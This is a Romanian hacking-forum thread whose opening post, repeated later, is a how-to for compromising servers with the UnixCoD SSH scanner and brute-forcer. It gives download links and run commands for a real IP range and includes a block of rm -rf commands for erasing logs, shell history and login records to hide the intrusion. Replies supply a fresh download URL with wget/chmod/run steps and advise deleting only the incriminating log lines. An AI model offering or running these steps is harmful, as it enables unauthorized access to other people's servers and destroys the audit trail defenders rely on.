sado Posted June 18, 2011 Report Share Posted June 18, 2011 Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi:De ce avem nevoie: -1- bucata scanner ssh -2- bucata brute force ssh -3- 2 in 1 ....Avem nevoie de scannerul: unixcodDescarcam scannerul:2shared - download unixcod.tar.gzPS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura. Deschidem consola..Folosim comanda de extragere: sudo tar -zxvf <sursa fisier>Fisierul este extras..acum frumos selectam din consola calea catre folder:cd <sursa fisier>Acum ca sa pornim scannerul , in folderul sursa , dam comanda: ./unix ip.ipUnde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111.EXEMPLU:Start scan:user@user-desktop:~/unixcod$ ./unix 70.70[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+][+] SSH Brute force scanner : user & password [+][+] Undernet Channel : #UnixCoD [+][+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+][+] Scanam: 70.70.4.* (total: 2) (1.6% done)Scan finish:[+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri][+] Incepe partea cea mai misto [+] Doar 66 de servere. Exista un inceput pt. toate ![=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][+] Incepem sa vedem cate server putem sparge[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ][+] UnixCoD Scanner a terminat de scanat !Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate:Avem comenzile urmatoare______________________________________________ | | +LOG REMOVE SHELL COMAND+ | | |___|____________________________________|___| | + | rm -rf unixcod | + | | + | rm -rf /tmp/logs | + | | + | rm -rf $HISTFILE | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_history | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_logout | + | | + | rm -rf /usr/local/apache/logs | + | | + | rm -rf /usr/local/apache/log | + | | + | rm -rf /var/apache/logs | + | | + | rm -rf /var/apache/log | + | | + | rm -rf /var/run/utmp | + | | + | rm -rf /var/logs | + | | + | rm -rf /var/log | + | | + | rm -rf /var/adm | + | | + | rm -rf /etc/wtmp | + | | + | rm -rf /etc/utmp | + | | + | | + | | + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + | | + | | + | |_+_|____________________________________|_+_|Alte completari o sa aduc in masura intrebarilor postate. 1 Link to comment Share on other sites More sharing options...
adonisslanic Posted June 19, 2011 Report Share Posted June 19, 2011 Fun fact: ca la o melodie disco, cred ca unixcod are vreo 1337 "remixuri" , unele din ele, sau poate chiar marea majoritate trimit mail la cei care fac "remixurile" cu logurile de scanari... Cauta despre ncrack, este mult mai eficient Ncrack - High-speed network authentication cracker Link to comment Share on other sites More sharing options...
sado Posted June 19, 2011 Author Report Share Posted June 19, 2011 Fun fact: ca la o melodie disco, cred ca unixcod are vreo 1337 "remixuri" , unele din ele, sau poate chiar marea majoritate trimit mail la cei care fac "remixurile" cu logurile de scanari... Cauta despre ncrack, este mult mai eficient Ncrack - High-speed network authentication crackerEu am scris asa ca sa invete cineve ceva..nu neaparat sa si puna in aplicare..era normal sa nu pun scannere/brute-force-uri puternice si eficiente...oricum e bine de stiut ce ai scris tu. Link to comment Share on other sites More sharing options...
Zatarra Posted June 19, 2011 Report Share Posted June 19, 2011 (edited) 1. De unde ai copiat prostia asta?2. Unixcod-ul e vechi rau3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100%5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16 Edited June 19, 2011 by Zatarra 1 Link to comment Share on other sites More sharing options...
sado Posted June 19, 2011 Author Report Share Posted June 19, 2011 1. De unde ai copiat prostia asta?2. Unixcod-ul e vechi rau3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100%5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16Apreciez ce ai zis , tutorialul e facut de mine in proportie de 100%..eu l-am scris cu mana mea ...oricum , mai am multe de invatat.. Link to comment Share on other sites More sharing options...
Zatarra Posted June 19, 2011 Report Share Posted June 19, 2011 Ok atunci hai sa iti explic unele chestii, poate inveti si tu ceva din ele:1. Ai pus degeaba sudo in fata comenzii de dezarhivare. Atat timp cat descarci arhiva cu un user ea va fii creata cu permisiunile setate prin umask-ul userului respectiv. Astfel nu e nevoie sa mai dai sudo pentru dezarhivare.2. O posibila problema ar putea fii permisiuniile fisierelor din arhiva, care sunt exact aceleasi cu cele din momentul arhivarii. Deci o comanda de chmod +x * ar rezolva problema3. Acum sa iti explic cum sta treaba cu logurile:a) degeaba stergi .bash_history deoarece tu vei sterge toata istoria comenzilor executate PANA in momentul in care te-ai logat tu pe server. degeaba stergi .ksh_history si .csh_history deoarece tu nu vei folosi nici Korn shell nici C shell.c) degeaba stergi .bash_logout deoarece nici un server nu face script in fisierul de logout.d) sa nu mai spun ca multe din locatiile care le stergi tu cu comenzile respective nu exista.e) singura cheste relativ folositoare e sa stergi access_log-ul cum spui tu, in cazul in care intri pe interfata web, dar nici asta nu e indicata deoarece e o metoda foarte clara ca cineva a fost pe server, asadar o alternativa ar fii sa stergi doar rand-urile care dovedesc ca tu ai trecut p'acolo.4. Ma bucur ca nu ai inceput sa injuri sau alte chestii de genul5. Bafta si alta data mai cere si tu ajutorul in stanga si in dreapta cand vrei sa faci un tutorial si nu esti sigur pe el 1 Link to comment Share on other sites More sharing options...
Apokalipt Posted July 28, 2011 Report Share Posted July 28, 2011 Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi:De ce avem nevoie: -1- bucata scanner ssh -2- bucata brute force ssh -3- 2 in 1 ....Avem nevoie de scannerul: unixcodDescarcam scannerul:2shared - download unixcod.tar.gzPS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura. Deschidem consola..Folosim comanda de extragere: sudo tar -zxvf <sursa fisier>Fisierul este extras..acum frumos selectam din consola calea catre folder:cd <sursa fisier>Acum ca sa pornim scannerul , in folderul sursa , dam comanda: ./unix ip.ipUnde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111.EXEMPLU:Start scan:user@user-desktop:~/unixcod$ ./unix 70.70[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+][+] SSH Brute force scanner : user & password [+][+] Undernet Channel : #UnixCoD [+][+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+][+] Scanam: 70.70.4.* (total: 2) (1.6% done)Scan finish:[+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri][+] Incepe partea cea mai misto [+] Doar 66 de servere. Exista un inceput pt. toate ![=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][+] Incepem sa vedem cate server putem sparge[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ][+] UnixCoD Scanner a terminat de scanat !Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate:Avem comenzile urmatoare______________________________________________ | | +LOG REMOVE SHELL COMAND+ | | |___|____________________________________|___| | + | rm -rf unixcod | + | | + | rm -rf /tmp/logs | + | | + | rm -rf $HISTFILE | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_history | + | | + | rm -rf /root/.ksh_history | + | | + | rm -rf /root/.bash_logout | + | | + | rm -rf /usr/local/apache/logs | + | | + | rm -rf /usr/local/apache/log | + | | + | rm -rf /var/apache/logs | + | | + | rm -rf /var/apache/log | + | | + | rm -rf /var/run/utmp | + | | + | rm -rf /var/logs | + | | + | rm -rf /var/log | + | | + | rm -rf /var/adm | + | | + | rm -rf /etc/wtmp | + | | + | rm -rf /etc/utmp | + | | + | | + | | + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + | | + | | + | |_+_|____________________________________|_+_|Alte completari o sa aduc in masura intrebarilor postate.partea proasta e ca linkul nu mai e valabil mie imi da eroare cand incerc sa il iau 2shared - download unixcod.tar.gz Link to comment Share on other sites More sharing options...
FearDotCom Posted July 28, 2011 Report Share Posted July 28, 2011 Descarca...http://tiger1ne.netfast.org/unixcod.tgz Link to comment Share on other sites More sharing options...
Apokalipt Posted July 28, 2011 Report Share Posted July 28, 2011 Descarca...http://tiger1ne.netfast.org/unixcod.tgzimi poti da si comenzile la el te rog frumos Link to comment Share on other sites More sharing options...
FearDotCom Posted July 28, 2011 Report Share Posted July 28, 2011 imi poti da si comenzile la el te rog frumoswget http://tiger1ne.netfast.org/unixcod.tgztar zxvf unixcod.tgzcd unixcodchmod +x *./unix 134.207Comenzile erau scrise in tutorial, app da scan si gata este hacker"NAVY NETWORK INFORMATION CENTER (NNIC) NAVY.MIL" Tocmai ai spart serveru navy.mil Link to comment Share on other sites More sharing options...
Apokalipt Posted July 28, 2011 Report Share Posted July 28, 2011 eu nu sunt hacker nici pe departe numai imi trebuie un psybnc atata tot si cum nimeni nu a vrut sa imi dea mi-am bagat linux pe un hard si ii dau drumu sa imi fac 1 bnc .... cat poate fi de greu? Link to comment Share on other sites More sharing options...
adonisslanic Posted July 28, 2011 Report Share Posted July 28, 2011 @Apokalipt wtf O_oLet me google that for you Link to comment Share on other sites More sharing options...
Apokalipt Posted August 1, 2011 Report Share Posted August 1, 2011 sal cum pot deschide vuln.txt din unixcod? Link to comment Share on other sites More sharing options...
Gabriel87 Posted August 3, 2011 Report Share Posted August 3, 2011 sal cum pot deschide vuln.txt din unixcod?rm -rf vuln.txt Link to comment Share on other sites More sharing options...
gotr00t Posted August 3, 2011 Report Share Posted August 3, 2011 aahahahahahanano vuln.txt / pico vuln.txt / vi vuln.txt Link to comment Share on other sites More sharing options...
zwargolak Posted December 27, 2011 Report Share Posted December 27, 2011 imi da eroare la scanat. la linia 13 cica nu exista ./findsi fisierul este.ceva idei?multumesc Link to comment Share on other sites More sharing options...
aelius Posted December 27, 2011 Report Share Posted December 27, 2011 init 0 # find ./ -name "find"sauinit 0 # locate find Link to comment Share on other sites More sharing options...
PingLord Posted December 29, 2011 Report Share Posted December 29, 2011 Domnu Tex,inainte de locate sa dea si un updatedb ca sa fie sigur ca il gaseste. Link to comment Share on other sites More sharing options...
Loqo Posted June 20, 2012 Report Share Posted June 20, 2012 gzip: stdin: not in gzip formattar: Child returned status 1tar: Error is not recoverable: exiting nownu reusesc sa dezarhivez.. Link to comment Share on other sites More sharing options...
Wazza91 Posted July 27, 2012 Report Share Posted July 27, 2012 (edited) Cunosc faptul ca este relativ vechi acest topic, dar doresc sa stiu si eu care ar fii motivele pentru care imi apare urmatoarea erroare :[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.[+] Unable to allocate socket.^CL.E. : Am rezolvat dupa cateva minute mi-am dat seama imediat,scuza-ti faptul ca am postat tocmai acum . Edited July 28, 2012 by Wazza91 Link to comment Share on other sites More sharing options...
olac81 Posted July 27, 2012 Report Share Posted July 27, 2012 o intrebare ...cei care sunt mai experimentati ...goshul nu este bun ? Link to comment Share on other sites More sharing options...
vip22 Posted July 31, 2012 Report Share Posted July 31, 2012 Unixcod dupa parerea mea e cam batran ...eu folosesc scannerul gosh pentru linux ...dar tot nu inteleg ce cauta SUDO langa TAR Link to comment Share on other sites More sharing options...
hades Posted July 31, 2012 Report Share Posted July 31, 2012 Sa-mi bag pula, sunteti complet retarzi. Redeschideti topicul pentru intrebari idioate. Gosh asta al vostru nu e cu nimic diferit de orice alt bruteforce. Pass_file-ul difera. Beliti in pula mea ochii la ce fisiere aveti acolo in folderul vietii si veti vedea ca sunt unele care se repeta in majoritatea scannerelor pentru idioti. Hackerilor. Link to comment Share on other sites More sharing options...
vip22 Posted July 31, 2012 Report Share Posted July 31, 2012 Scuzama dar unixul il gasesti numai cu scam gosh-ul insa mai rar si in plus e mai rapid ...dar foarte adevarat conteaza mult si pass file .. Link to comment Share on other sites More sharing options...
hades Posted July 31, 2012 Report Share Posted July 31, 2012 Ba tu esti prost? Gosh-ul e un cacat de scanner, care are vreo 5-6 pass_file-uri pe care le ia la rand cand face bruteforce cu acelasi 'ssh-scan' pe care-l au toate scannerele. Unixcod-ul avea alt script pt brutforce, dar pe aceiasi idee. Link to comment Share on other sites More sharing options...
